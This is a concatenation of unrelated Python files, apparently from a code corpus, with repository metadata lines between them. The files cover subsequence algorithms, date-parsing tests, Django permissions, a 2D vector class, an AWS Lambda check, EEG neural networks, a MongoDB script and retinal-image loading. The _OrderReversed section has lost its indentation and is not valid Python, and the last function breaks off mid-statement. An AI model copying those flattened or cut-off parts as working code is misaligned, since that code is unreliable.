    >>> longest_decreasing_subsequence([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
    [12, 10, 9, 5, 3]
    >>> longest_decreasing_subsequence([0, 0, 1, 2, 3, 2, 1, 0, 0])
    [3, 2, 1, 0, 0]
    >>> longest_decreasing_subsequence([0, 0, 1, 2, 3, 2, 1, 0, 0], strict=True)
    [3, 2, 1, 0]

    :param seq: A sequence-like container of comparable objects.
    :param strict: Whether the subsequence must be strictly decreasing.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :return: The longest decreasing subsequence in seq as a list.
    """
    try:
        # Fast path: negate values (or keys) to reuse the increasing-order
        # machinery; valid whenever unary minus is order-reversing.
        return _longest_monotone_subsequence(seq, False, strict, key, True)
    except TypeError:
        pass
    # Negation unsupported (e.g. strings): fall back to a comparison wrapper.
    return _longest_monotone_subsequence(seq, False, strict, key, False)
def longest_increasing_subsequence_indices(seq: Sequence[T], strict=False, key: Optional[Callable] = None) -> List[int]:
    """
    Returns the indices of the longest increasing subsequence of the given sequence.

    There may be other increasing subsequences of the same length.

    >>> longest_increasing_subsequence_indices([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
    [0, 4, 6, 9, 13, 15]
    >>> longest_increasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0])
    [0, 1, 2, 3, 5]
    >>> longest_increasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0], strict=True)
    [0, 2, 3, 4]

    :param seq: A sequence-like container of comparable objects.
    :param strict: Whether the subsequence must be strictly increasing.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :return: A list of indices of the longest increasing subsequence in seq.
    """
    return _longest_monotone_subsequence_indices(seq, True, strict, key)
def longest_decreasing_subsequence_indices(seq: Sequence[T], strict=False, key: Optional[Callable] = None) -> List[int]:
    """
    Returns the indices of the longest decreasing subsequence of the given sequence.

    There may be other decreasing subsequences of the same length.

    >>> longest_decreasing_subsequence_indices([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
    [3, 5, 9, 10, 12]
    >>> longest_decreasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0])
    [4, 5, 6, 7, 8]
    >>> longest_decreasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0], strict=True)
    [4, 5, 6, 7]

    :param seq: A sequence-like container of comparable objects.
    :param strict: Whether the subsequence must be strictly decreasing.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :return: A list of indices of the longest decreasing subsequence in seq.
    """
    try:
        # Fast path: negate values (or keys) to reuse the increasing-order
        # machinery; valid whenever unary minus is order-reversing.
        return _longest_monotone_subsequence_indices(seq, False, strict, key, True)
    except TypeError:
        pass
    # Negation unsupported (e.g. strings): fall back to a comparison wrapper.
    return _longest_monotone_subsequence_indices(seq, False, strict, key, False)
def _longest_monotone_subsequence(seq: Sequence[T], increasing=True, strict=False, key: Optional[Callable] = None, assume_negatable=True) -> List[T]:
    """
    Returns a list of the values of the longest increasing (respectively decreasing) subsequence of the given sequence.

    There may be other increasing (respectively decreasing) subsequences of the same length.
    This is not a public function, use a longest_increasing_* or longest_decreasing_* function instead.

    :param seq: A sequence-like container of comparable objects.
    :param increasing: Whether the subsequence should be increasing or decreasing.
    :param strict: Whether the subsequence must be strictly monotone.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :param assume_negatable: If True (the default), assume that negation (unary -) is defined and is order-reversing on objects or keys.
        For non-negatable types, set this option to False.
    :return: The values of the longest monotone subsequence in seq, as a list.
    """
    return [seq[idx] for idx in _longest_monotone_subsequence_indices_iter(seq, increasing, strict, key, assume_negatable)]
def _longest_monotone_subsequence_indices(seq: Sequence[T], increasing=True, strict=False, key: Optional[Callable] = None, assume_negatable=True) -> List[int]:
    """
    Gives a list of the indices of the longest increasing (respectively decreasing) subsequence of the given sequence.

    There may be other increasing (respectively decreasing) subsequences of the same length.
    This is not a public function, use a longest_increasing_* or longest_decreasing_* function instead.

    :param seq: A sequence-like container of comparable objects.
    :param increasing: Whether the subsequence should be increasing or decreasing.
    :param strict: Whether the subsequence must be strictly monotone.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :param assume_negatable: If True (the default), assume that negation (unary -) is defined and is order-reversing on objects or keys.
        For non-negatable types, set this option to False.
    :return: A list of indices of the longest monotone subsequence in seq.
    """
    return list(_longest_monotone_subsequence_indices_iter(seq, increasing, strict, key, assume_negatable))
def _longest_monotone_subsequence_indices_iter(seq: Sequence[T], increasing=True, strict=False, key: Optional[Callable] = None, assume_negatable=True) -> Iterator[int]:
    """
    Yields the indices of the longest increasing (respectively decreasing) subsequence of the given sequence.

    There may be other monotone subsequences of the same length.
    This is not a public function, use a longest_increasing_* or longest_decreasing_* function instead.

    Runs in O(n log n) using the patience-sorting formulation of the
    longest-increasing-subsequence algorithm; decreasing order is handled
    by transforming the keys so they become increasing.

    :param seq: A sequence-like container of comparable objects.
    :param increasing: Whether the subsequence should be increasing or decreasing.
    :param strict: Whether the subsequence must be strictly monotone.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :param assume_negatable: If True (the default), assume that negation (unary -) is defined and is order-reversing on objects or keys.
        For non-negatable types, set this option to False.
    :return: An iterator of indices of the longest monotone subsequence in seq.
    """
    if not seq:
        # Empty input: return an already-exhausted generator.
        return (_ for _ in [])

    # idx_prev_longest[i]: index of the previous element of the longest
    # monotone subsequence ending at i (None if i starts a subsequence).
    idx_prev_longest: List[Optional[int]] = []
    idx_min_of_len_plus1: List[int] = []  # the index of the smallest value ending a subsequence of a given length+1
    val_min_of_len_plus1: List[Any] = []  # the smallest value ending a subsequence of a given length+1

    # bisect_right admits equal terminal values (non-strict subsequences);
    # bisect_left rejects them (strict subsequences).
    bisect = bisect_right if not strict else bisect_left
    # key_fn transforms values so that "increasing in key space" is the
    # desired order; None means compare the raw values.
    key_fn = _choose_key_function(key, increasing, assume_negatable)
    keys = seq if key_fn is None else map(key_fn, seq)
    for i, curr_key in enumerate(keys):
        # Length of the longest subsequence this element can extend.
        len_longest_extendable = bisect(val_min_of_len_plus1, curr_key)
        if len_longest_extendable == len(val_min_of_len_plus1):
            # Extends the longest chain found so far by one element.
            idx_min_of_len_plus1.append(i)
            val_min_of_len_plus1.append(curr_key)
        elif curr_key < val_min_of_len_plus1[len_longest_extendable]:
            # Better (smaller) terminal value for this length: replace it.
            idx_min_of_len_plus1[len_longest_extendable] = i
            val_min_of_len_plus1[len_longest_extendable] = curr_key
        idx_longest_extendable = idx_min_of_len_plus1[len_longest_extendable - 1] if len_longest_extendable else None
        idx_prev_longest.append(idx_longest_extendable)

    # Backtrack through the parent pointers from the end of the best chain.
    longest_subsequence_indices = _make_subsequence_indices(prev_indices=idx_prev_longest,
                                                            terminal_idx=idx_min_of_len_plus1[-1])
    return longest_subsequence_indices
class _OrderReversed:
"""
A wrapper around any object that swaps its < and > operators (without touching the actual object).
>>> _OrderReversed(0) > _OrderReversed(1)
True
>>> repr(_OrderReversed(0))
'_OrderReversed(0)'
"""
__slots__ = ('obj',)
def __init__(self, o):
self.obj = o
def __lt__(self, other):
return self.obj > other.obj
def __gt__(self, other):
return self.obj < other.obj
def __repr__(self):
return f'{self.__class__.__name__}({self.obj!r})'
def _choose_key_function(key: Optional[Callable], increasing: bool, assume_negatable: bool) -> Optional[Callable]:
"""
Gives back the key function with its order optionally reversed. None represents the identity function.
>>> _choose_key_function(None, True, True) is None
True
>>> _choose_key_function(None, True, False) is None
True
>>> fn = _choose_key_function(None, False, True)
>>> fn(0) > fn(1)
True
>>> fn = _choose_key_function(None, False, False)
>>> fn(0) > fn(1)
True
>>> fn = _choose_key_function(len, True, False)
>>> fn("X") < fn("AA")
True
>>> fn = _choose_key_function(len, True, True)
>>> fn("X") < fn("AA")
True
>>> fn = _choose_key_function(len, False, False)
>>> fn("AA") < fn("X")
True
"""
if key is None:
if increasing:
key_fn = None
elif assume_negatable:
key_fn = operator.neg
else:
def key_fn(v):
return _OrderReversed(v)
else:
orig_key = key
if increasing:
key_fn = orig_key
elif assume_negatable:
def key_fn(v):
return -orig_key(v)
else:
def key_fn(v):
return _OrderReversed(orig_key(v))
return key_fn
def _make_reversed_subsequence_indices(prev_indices: List[Optional[int]], terminal_idx: int) -> Iterator[int]:
"""
Given a list of indices representing pointers to parent, and given a terminal pointer, yields indices from the terminal to the root.
>>> list(_make_reversed_subsequence_indices([None, 0, 0, 1, 2, 1], 5))
[5, 1, 0]
"""
idx: Optional[int] = terminal_idx
while idx is not None:
yield idx
idx = prev_indices[idx]
def _make_subsequence_indices(prev_indices: List[Optional[int]], terminal_idx: int) -> Iterator[int]:
"""
Given a list of indices representing pointers to parent, and given a terminal pointer, yields indices from the root to the terminal index.
>>> list(_make_subsequence_indices([None, 0, 0, 1, 2, 1], 5))
[0, 1, 5]
"""
return reversed(list(_make_reversed_subsequence_indices(prev_indices, terminal_idx)))
| 4.0625 | 4 |
tests/test_common.py | multiplechoice/workplace | 2 | 12767364 | <filename>tests/test_common.py<gh_stars>1-10
from jobs.common import decode_date_string, translate_month
from freezegun import freeze_time
def test_month_lookups():
    # Icelandic month abbreviations map to their month numbers 1..12.
    expected = {
        "jan": 1,
        "feb": 2,
        "mars": 3,
        "apr\u00edl": 4,
        "ma\u00ed": 5,
        "j\u00fan\u00ed": 6,
        "j\u00fal\u00ed": 7,
        "\u00e1g\u00fast": 8,
        "sept": 9,
        "okt": 10,
        "n\u00f3v": 11,
        "des": 12,
    }
    for month_name, month_number in expected.items():
        assert translate_month(month_name) == month_number
def test_unknown_month():
    # English month names are not recognised; the lookup returns None.
    assert translate_month("January") is None
def test_decoding_whole_string_from_tvinna():
    # Tvinna dates carry an explicit year; decode to ISO-8601.
    expected = {
        "27. apr\u00edl 2011": "2011-04-27",
        "30. \u00e1g\u00fast 2013": "2013-08-30",
        "9. ma\u00ed 2014": "2014-05-09",
        "10. j\u00fal\u00ed 2014": "2014-07-10",
        "3. n\u00f3v. 2014": "2014-11-03",
        "3. feb. 2015": "2015-02-03",
        "29. feb. 2016": "2016-02-29",
    }
    for raw, iso in expected.items():
        assert decode_date_string(raw) == iso
@freeze_time("1st April, 2017")
def test_decoding_whole_string_from_mbl():
    # mbl.is omits the year, so decoding is relative to the frozen "today".
    expected = {
        "1. ma\u00ed.": "2017-05-01",
        "10. ma\u00ed.": "2017-05-10",
        "16. apr.": "2017-04-16",
    }
    for raw, iso in expected.items():
        assert decode_date_string(raw) == iso
def test_nonetype():
    # sometimes dates are expected but are empty, meaning we pass a None to
    # the decode function; it must propagate None rather than raise
    assert decode_date_string(None) is None
@freeze_time("1st April, 2017")
def test_whitespace():
    # need to ensure that the decoder can handle whitespace
    # NOTE(review): the three literals below appear to differ only in
    # leading/trailing whitespace (possibly including non-breaking
    # spaces) — preserve them byte-for-byte.
    assert decode_date_string(" 15. apríl") == "2017-04-15"
    assert decode_date_string(" 15. apríl") == "2017-04-15"
    assert decode_date_string(" 15. apríl ") == "2017-04-15"
| 2.390625 | 2 |
leasing/permissions.py | suutari-ai/mvj | 1 | 12767365 | from rest_framework import permissions
class MvjDjangoModelPermissions(permissions.DjangoModelPermissions):
    """Customized Django REST Framework DjangoModelPermissions

    class that includes checking for the "view" permissions too.
    """

    # Same map as the DRF base class, except GET/HEAD additionally
    # require the model's "view" permission instead of being open.
    perms_map = {
        "GET": ["%(app_label)s.view_%(model_name)s"],
        "OPTIONS": [],
        "HEAD": ["%(app_label)s.view_%(model_name)s"],
        "POST": ["%(app_label)s.add_%(model_name)s"],
        "PUT": ["%(app_label)s.change_%(model_name)s"],
        "PATCH": ["%(app_label)s.change_%(model_name)s"],
        "DELETE": ["%(app_label)s.delete_%(model_name)s"],
    }
class PerMethodPermission(permissions.BasePermission):
    """Per method permission check

    Permission where the required permissions can be configured per
    method, either here or via a ``perms_map`` attribute on the view.
    Returns True if no permissions are configured. If multiple
    permissions are listed, the user must have all of them."""

    perms_map = {
        "GET": [],
        "POST": [],
        "PUT": [],
        "PATCH": [],
        "DELETE": [],
        "OPTIONS": [],
    }

    def get_required_permissions(self, method, view):
        """Return the permission codes required for *method* on *view*."""
        # The view's own perms_map entries override the class defaults.
        merged = self.perms_map.copy()
        merged.update(getattr(view, "perms_map", {}))
        return merged.get(method, [])

    def has_permission(self, request, view):
        user = request.user
        if not user or not user.is_authenticated:
            return False
        required_perms = self.get_required_permissions(request.method, view)
        return user.has_perms(required_perms)
class IsSameUser(permissions.BasePermission):
    """Object-level check: allow access when the object has no owner, or
    when the requesting user is the owner."""

    def has_object_permission(self, request, view, obj):
        owner = getattr(obj, "user", None)
        if not owner:
            # No owner recorded: nothing to protect.
            return True
        return owner == request.user
| 2.40625 | 2 |
src/vector2D.py | germtb/PyLight | 0 | 12767366 | from cmath import sqrt
from math import hypot
from utils import near_equal
class Vector2D:
    """A simple 2D vector with arithmetic, comparison and hashing support.

    Equality is approximate (delegates to ``utils.near_equal``), so two
    vectors whose components differ only by floating point noise compare
    equal. Note that ``__hash__`` is based on the exact ``str`` form, so
    near-equal (but not identical) vectors may still hash differently.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def normalized(self):
        """Return a unit-length copy of this vector.

        Raises ZeroDivisionError for the zero vector.
        """
        # BUGFIX: the modulus was computed with cmath.sqrt, which returns a
        # complex number and therefore produced complex components. hypot
        # (already imported in this module) gives the real magnitude.
        modulus = hypot(self.x, self.y)
        return Vector2D(self.x / modulus, self.y / modulus)

    def dot(self, point):
        """Return the dot product with *point*."""
        return self.x * point.x + self.y * point.y

    def dif(self, point):
        """Return the component-wise difference ``self - point``."""
        return Vector2D(self.x - point.x, self.y - point.y)

    def inverse(self):
        """Return a vector v with ``v.dot(self) == 1``; zero components stay zero.

        Raises ZeroDivisionError for the zero vector (its dot product is 0).
        """
        x = 0 if self.x == 0 else 1 / self.x
        y = 0 if self.y == 0 else 1 / self.y
        return Vector2D(x, y) * (1 / Vector2D(x, y).dot(self))

    def close(self, point):
        """Component-wise approximate equality via utils.near_equal."""
        return near_equal(self.x, point.x) and near_equal(self.y, point.y)

    def __repr__(self, *args, **kwargs):
        return '(' + str(self.x) + ', ' + str(self.y) + ')'

    def __str__(self):
        return '(' + str(self.x) + ', ' + str(self.y) + ')'

    def __eq__(self, other):
        # Approximate equality, consistent with close().
        return self.close(other)

    def __add__(self, other):
        # type(self) keeps subclasses closed under arithmetic.
        return type(self)(self.x + other.x, self.y + other.y)

    def __sub__(self, other):
        return type(self)(self.x - other.x, self.y - other.y)

    def __mul__(self, other):
        """Scalar multiplication only (``other`` is a number)."""
        return type(self)(self.x * other, self.y * other)

    def distance_to(self, other):
        """Euclidean distance to *other*."""
        return hypot((self.x - other.x), (self.y - other.y))

    def __hash__(self, *args, **kwargs):
        # Hash of the exact string form; see class docstring caveat.
        return hash(str(self))
import unittest
class Vector2DTests(unittest.TestCase):
    """Unit tests for Vector2D (equality is via the approximate __eq__)."""

    def setUp(self):
        self.v1 = Vector2D(1, 1)
        self.v2 = Vector2D(2, 2)
        self.v3 = Vector2D(3, 0)

    def test_normalized(self):
        # (3, 0) normalizes to the unit x-axis vector.
        self.assertEqual(self.v3.normalized(), Vector2D(1, 0))

    def test_dot(self):
        # (1, 1) . (2, 2) == 4
        self.assertEqual(self.v1.dot(self.v2), 4)

    def test_dif(self):
        self.assertEqual(self.v1 - self.v2, Vector2D(-1, -1))

    def test_inverse(self):
        # inverse of (3, 0) satisfies inverse.dot(v3) == 1.
        self.assertEqual(self.v3.inverse(), Vector2D(1 / 3, 0))

    def test_mul(self):
        # Scalar multiplication scales both components.
        self.assertEqual(self.v1 * 2, Vector2D(2, 2))

    def test_sum(self):
        self.assertEqual(self.v1 + self.v2, Vector2D(3, 3))


if __name__ == '__main__':
    unittest.main()
| 3.4375 | 3 |
maestro/providers/aws/check_existence.py | tunein/Maestro | 12 | 12767367 | #External libs
import boto3
import sys
import json
import os
from botocore.exceptions import ClientError
#Establish our boto resources
client = boto3.client('lambda')
#This is only here for printing pretty colors
class color:
    """ANSI escape codes used to colorize terminal output."""
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    # Resets all attributes back to the terminal default.
    END = '\033[0m'
def check(lambda_name):
    '''
    Returns True when a lambda function with the given name exists,
    False otherwise (after printing the AWS error response).

    args:
        lambda_name: name of the lambda, retrieved from config file
    '''
    try:
        function = client.get_function(FunctionName=lambda_name)
    except ClientError as error:
        # get_function raises (e.g. ResourceNotFoundException) when the
        # function is missing; report the response and return an explicit
        # False instead of the implicit None callers previously received.
        print(error.response)
        return False
    # get_function returns a non-empty mapping on success.
    return len(function) > 0
def check_alias(lambda_name, alias):
    '''
    Checks our lambda to ensure the alias we want to import from exists;
    exits the process when it does not.

    args:
        lambda_name: name of the lambda we're checking
        alias: name of the alias we're checking
    '''
    try:
        alias = client.get_alias(FunctionName=lambda_name, Name=alias)
    except ClientError as error:
        print(error.response['Error']['Message'])
        # BUGFIX: a `return True` inside a `finally` block used to swallow
        # this SystemExit, so the failure path silently returned True.
        sys.exit(1)
    print("Alias located successfully!")
    return True
models/contrastive.py | TheoMoutakanni/TCC-EEG | 0 | 12767368 | <gh_stars>0
import numpy as np
from sklearn.metrics import balanced_accuracy_score
from skorch import NeuralNetClassifier
from skorch.helper import predefined_split
from skorch.callbacks import EpochScoring, ProgressBar, EarlyStopping
import torch
from torch import nn
import torch.nn.functional as F
from utils.skorch import EEGTransformer
class EncoderNet(nn.Module):
    """Convolutional EEG feature extractor.

    The first conv spans all input channels (kernel height ``n_channels``);
    every later conv works on the collapsed channel axis (height 1). Each
    stage is Conv -> ReLU -> (BatchNorm|Identity) -> Dropout -> MaxPool,
    followed by global average pooling down to ``feat_per_layer[-1]``
    features per window.
    """

    def __init__(self, feat_per_layer, n_channels, p_dropout=0.25, apply_batch_norm=False):
        super().__init__()
        self.num_features = feat_per_layer[-1]

        norm_cls = nn.BatchNorm2d if apply_batch_norm else nn.Identity

        layers = []
        in_feats = 1
        kernel_height = n_channels  # only the first conv spans the channels
        for out_feats in feat_per_layer:
            layers += [
                nn.Conv2d(in_channels=in_feats,
                          out_channels=out_feats,
                          kernel_size=(kernel_height, 50)),
                nn.ReLU(),
                norm_cls(out_feats),
                nn.Dropout(p_dropout),
                nn.MaxPool2d(kernel_size=(1, 6), stride=(1, 6)),
            ]
            in_feats = out_feats
            kernel_height = 1

        self.feature_extractor = nn.Sequential(
            *layers,
            nn.AdaptiveAvgPool2d(1),
            nn.Flatten(),
        )

    def forward(self, x):
        """
        Input shape: (batch_size, n_channels, window_size)
        Output shape: (batch_size, num_features)
        """
        # Add the singleton "image channel" dimension expected by Conv2d.
        return self.feature_extractor(x.unsqueeze(1))
class ContrastiveModule(nn.Module):
    """Siamese head for contrastive pretraining: classifies a pair of EEG
    windows from the absolute difference of their encoder features."""

    def __init__(self, encoder):
        super(ContrastiveModule, self).__init__()
        # Shared feature extractor applied to both windows of a pair.
        self.encoder = encoder
        self.num_features = self.encoder.num_features
        # Binary head over the symmetric |f(x1) - f(x2)| representation.
        self.fc = nn.Linear(in_features=self.num_features, out_features=2)

    def forward(self, x):
        """
        Input shape: (batch_size, 2, nb_channels, window_size)
        Output: tuple of pair logits with shape (batch_size, 2) and the
        stacked encoder features with shape (batch_size * 2, num_features)
        """
        batch_size, _, nb_channels, window_size = x.shape
        # Fold the pair axis into the batch so both windows go through the
        # encoder in one pass with shared weights.
        x = x.view(batch_size * 2, nb_channels, window_size)
        x = self.encoder(x)
        features = x
        x = x.view(batch_size, 2, self.num_features)
        x1, x2 = x[:, 0], x[:, 1]
        # Symmetric distance representation of the pair.
        x = torch.abs(x1 - x2)
        x = self.fc(x)
        return x, features

    def train_(self, train_set, valid_set, lr=5e-4, batch_size=16, max_nb_epochs=20,
               early_stopping_patience=5, early_stopping_monitor='valid_bal_acc'):
        """Fit this module with skorch and return the fitted EEGTransformer."""
        # Train using a GPU if possible
        device = "cuda" if torch.cuda.is_available() else "cpu"

        # Callbacks: track balanced accuracy on both splits and stop early
        # on the configured monitor (lower-is-better when it is a loss).
        train_bal_acc = EpochScoring(
            scoring='balanced_accuracy', on_train=True, name='train_bal_acc',
            lower_is_better=False)
        valid_bal_acc = EpochScoring(
            scoring='balanced_accuracy', on_train=False, name='valid_bal_acc',
            lower_is_better=False)
        early_stopping = EarlyStopping(
            monitor=early_stopping_monitor, patience=early_stopping_patience,
            lower_is_better='loss' in early_stopping_monitor)
        callbacks = [
            ('train_bal_acc', train_bal_acc),
            ('valid_bal_acc', valid_bal_acc),
            ('progress_bar', ProgressBar()),
            ('early_stopping', early_stopping),
        ]

        # Skorch model creation
        skorch_net = EEGTransformer(
            self.to(device),
            criterion=torch.nn.CrossEntropyLoss,
            optimizer=torch.optim.Adam,
            optimizer__lr=lr,
            train_split=predefined_split(valid_set),
            batch_size=batch_size,
            callbacks=callbacks,
            device=device
        )

        # Training: `y` is None since it is already supplied in the dataset.
        skorch_net.fit(train_set, y=None, epochs=max_nb_epochs)
        return skorch_net
class ClassifierNet(nn.Module):
    """Five-class classifier head on top of a (pretrained) encoder.

    BUGFIX: the previous version applied ``Softmax`` in ``forward`` while
    training used ``torch.nn.CrossEntropyLoss`` (which applies log-softmax
    internally); the double normalisation degrades the gradients. The
    forward pass now returns raw class scores (logits). Argmax-based
    predictions are unaffected by this change.
    """

    def __init__(self, encoder, p_dropout=0.4):
        super(ClassifierNet, self).__init__()
        # Feature extractor; must expose ``num_features``.
        self.encoder = encoder
        # Dense classifier
        self.dropout = nn.Dropout(p_dropout)
        self.dense1 = nn.Linear(encoder.num_features, encoder.num_features)
        self.dense2 = nn.Linear(encoder.num_features, 5)

    def forward(self, x):
        """
        Input shape: (batch_size, n_channels, window_size)
        Output shape: (batch_size, 5) raw class scores (logits)
        """
        x = self.encoder(x)
        x = self.dropout(x)
        x = self.dense1(x)
        x = F.relu(x)
        x = self.dense2(x)
        return x
def train_and_test(
        classifier_net, train_set, valid_set, test_set=None, lr=5e-4,
        batch_size=16, max_nb_epochs=20, early_stopping_patience=5,
        early_stopping_monitor='valid_bal_acc',
        train_what="last", score_fn=balanced_accuracy_score):
    """Fine-tune *classifier_net* with skorch and optionally score a test set.

    train_what: "last" freezes the encoder so only the dense head is
        trained; any other value fine-tunes the whole network.
    early_stopping_monitor: metric watched by early stopping (treated as
        lower-is-better when its name contains 'loss').
    Returns the fitted ``NeuralNetClassifier``; when *test_set* is given,
    returns ``(classifier, score)`` instead.
    """
    if train_what == "last":
        for param in classifier_net.encoder.parameters():
            param.requires_grad = False
    else:  # train all
        for param in classifier_net.encoder.parameters():
            param.requires_grad = True
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    # Callbacks
    train_bal_acc = EpochScoring(
        scoring='balanced_accuracy', on_train=True, name='train_bal_acc',
        lower_is_better=False)
    valid_bal_acc = EpochScoring(
        scoring='balanced_accuracy', on_train=False, name='valid_bal_acc',
        lower_is_better=False)
    # Bug fix: the `early_stopping_monitor` argument used to be ignored
    # (the monitor was hard-coded to 'valid_bal_acc').  Honour it here,
    # consistently with `train_` above; the default is unchanged, so
    # existing callers behave identically.
    early_stopping = EarlyStopping(
        monitor=early_stopping_monitor, patience=early_stopping_patience,
        lower_is_better='loss' in early_stopping_monitor)
    callbacks = [
        ('train_bal_acc', train_bal_acc),
        ('valid_bal_acc', valid_bal_acc),
        ('progress_bar', ProgressBar()),
        ('early_stopping', early_stopping),
    ]
    skorch_classifier = NeuralNetClassifier(
        classifier_net,
        criterion=torch.nn.CrossEntropyLoss,
        optimizer=torch.optim.Adam,
        # using valid_set for validation
        train_split=predefined_split(valid_set),
        optimizer__lr=lr,
        batch_size=batch_size,
        callbacks=callbacks,
        device=device,
        # Shuffle training data on each epoch
        iterator_train__shuffle=True,
    )
    # Model training for a specified number of epochs. `y` is None as it is
    # already supplied in the dataset.
    skorch_classifier.fit(train_set, y=None, epochs=max_nb_epochs)
    if test_set is not None:
        X, y = zip(*list(iter(test_set)))
        X = torch.stack(X)
        y_pred = skorch_classifier.predict(X)
        # NOTE(review): sklearn scorers expect (y_true, y_pred); here the
        # prediction is passed first — confirm score_fn is symmetric or the
        # order is intended.
        acc = score_fn(y_pred, y)
        return skorch_classifier, acc
    return skorch_classifier
| 2.203125 | 2 |
mangodb/test.py | 1005281342/learn | 1 | 12767369 | <reponame>1005281342/learn<filename>mangodb/test.py
"""
启动mongodb
mongod --config /usr/local/etc/mongod.conf
"""
import time
from pymongo import MongoClient
conn = MongoClient(host='127.0.0.1', port=27017)
test_db = conn['test']
test_table = test_db['test_table']
# test_table = test_db['test_table_city']
# res = test_table.find_one({"_id": "123"})
# print(res)
# if res:
# print("---")
# else:
# data = {
# "_id": "123"
# }
# test_table.save(data)
# # 增, 改
data = {
"_id": "02_2019-02-29",
"date_string": '2019-01-29',
"spl_id": '01',
"roomtype_count": '1022',
"roomtype_has_mapping_count": '500',
"update": time.strftime('%Y-%m-%d', time.localtime(time.time()))
}
test_table.save(data)
res_data = test_table.find_one("02_2019-02-29")
print(res_data)
#
# # 查
aa = test_table.find_one({"_id": '022_2019-02-29'})
print(aa)
| 2.515625 | 3 |
visualdet3d/networks/detectors/__init__.py | tamnguyenvan/visualdet3d-tf | 0 | 12767370 | <reponame>tamnguyenvan/visualdet3d-tf
from .yolostereo3d_detector import YOLOStereo3DCore | 0.835938 | 1 |
activelearning/utils.py | xiaoqiqi177/DR-segmentation | 2 | 12767371 | import os
import glob
from preprocess import clahe_gridsize
import cv2
# Dataset split fractions used by get_images (train/eval/test sum to 1.0).
train_ratio = 0.7
eval_ratio = 0.3
test_ratio = 0.
def get_images(image_dir, preprocess=False, phase='train', healthy_included=True):
    """Collect image paths and per-lesion mask paths for one dataset phase.

    image_dir: dataset root containing ApparentRetinopathy/,
        NoApparentRetinopathy/ and GroundTruth/.
    preprocess: when True, run brightness-balanced CLAHE over every image
        once and read images from the *_CLAHE directories afterwards.
    phase: 'train' / 'eval' / 'test' split, cut using the module-level
        ratio constants.
    healthy_included: when False, only ApparentRetinopathy images are used.

    Returns (image_paths, mask_paths) where mask_paths[i] holds the paths
    (or None when a file is absent) for the lesions EX, HE, MA, SE, MASK.
    """
    if preprocess:
        # CLAHE clip limit and tile grid size.
        limit = 2
        grid_size = 8
        if not os.path.exists(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE')):
            os.mkdir(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE'))
            os.mkdir(os.path.join(image_dir, 'NoApparentRetinopathy_CLAHE'))
        apparent_ori = glob.glob(os.path.join(image_dir, 'ApparentRetinopathy/*.jpg'))
        noapparent_ori = glob.glob(os.path.join(image_dir, 'NoApparentRetinopathy/*.jpg'))
        apparent_ori.sort()
        noapparent_ori.sort()
        # mean brightness over the non-masked area of every image,
        # used to balance brightness across the dataset.
        meanbright = 0.
        for img_path in apparent_ori + noapparent_ori:
            img_name = os.path.split(img_path)[-1].split('.')[0]
            mask_path = os.path.join(image_dir, 'GroundTruth', 'MASK', img_name+'_MASK.tif')
            gray = cv2.imread(img_path, 0)
            mask_img = cv2.imread(mask_path, 0)
            brightness = gray.sum() / (mask_img.shape[0] * mask_img.shape[1] - mask_img.sum() / 255.)
            meanbright += brightness
        meanbright /= len(apparent_ori + noapparent_ori)
        # preprocess for apparent.
        for img_path in apparent_ori:
            img_name = os.path.split(img_path)[-1].split('.')[0]
            mask_path = os.path.join(image_dir, 'GroundTruth', 'MASK', img_name+'_MASK.tif')
            clahe_img = clahe_gridsize(img_path, mask_path, denoise=True, verbose=False, brightnessbalance=meanbright, cliplimit=limit, gridsize=grid_size)
            cv2.imwrite(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE', os.path.split(img_path)[-1]), clahe_img)
        # preprocess for noapparent.
        for img_path in noapparent_ori:
            img_name = os.path.split(img_path)[-1].split('.')[0]
            mask_path = os.path.join(image_dir, 'GroundTruth', 'MASK', img_name+'_MASK.tif')
            clahe_img = clahe_gridsize(img_path, mask_path, denoise=True, verbose=False, brightnessbalance=meanbright, cliplimit=limit, gridsize=grid_size)
            cv2.imwrite(os.path.join(image_dir, 'NoApparentRetinopathy_CLAHE', os.path.split(img_path)[-1]), clahe_img)
        apparent = glob.glob(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE/*.jpg'))
        noapparent = glob.glob(os.path.join(image_dir, 'NoApparentRetinopathy_CLAHE/*.jpg'))
    else:
        apparent = glob.glob(os.path.join(image_dir, 'ApparentRetinopathy/*.jpg'))
        noapparent = glob.glob(os.path.join(image_dir, 'NoApparentRetinopathy/*.jpg'))
    apparent.sort()
    noapparent.sort()

    image_paths = []
    mask_paths = []
    if healthy_included:
        imgset = [apparent, noapparent]
    else:
        imgset = [apparent]
    # Split each image group deterministically (lists are sorted above).
    for each in imgset:
        train_number = int(len(each) * train_ratio)
        eval_number = int(len(each) * eval_ratio)
        if phase == 'train':
            image_paths.extend(each[:train_number])
        elif phase == 'eval':
            image_paths.extend(each[train_number:train_number+eval_number])
        else:
            image_paths.extend(each[train_number+eval_number:])
    # Pair every image with its per-lesion ground-truth files (None if absent).
    mask_path= os.path.join(image_dir, 'GroundTruth')
    lesions = ['EX', 'HE', 'MA', 'SE', 'MASK']
    for image_path in image_paths:
        paths = []
        name = os.path.split(image_path)[1].split('.')[0]
        for lesion in lesions:
            candidate_path = os.path.join(mask_path, lesion, name+'_'+lesion+'.tif')
            if os.path.exists(candidate_path):
                paths.append(candidate_path)
            else:
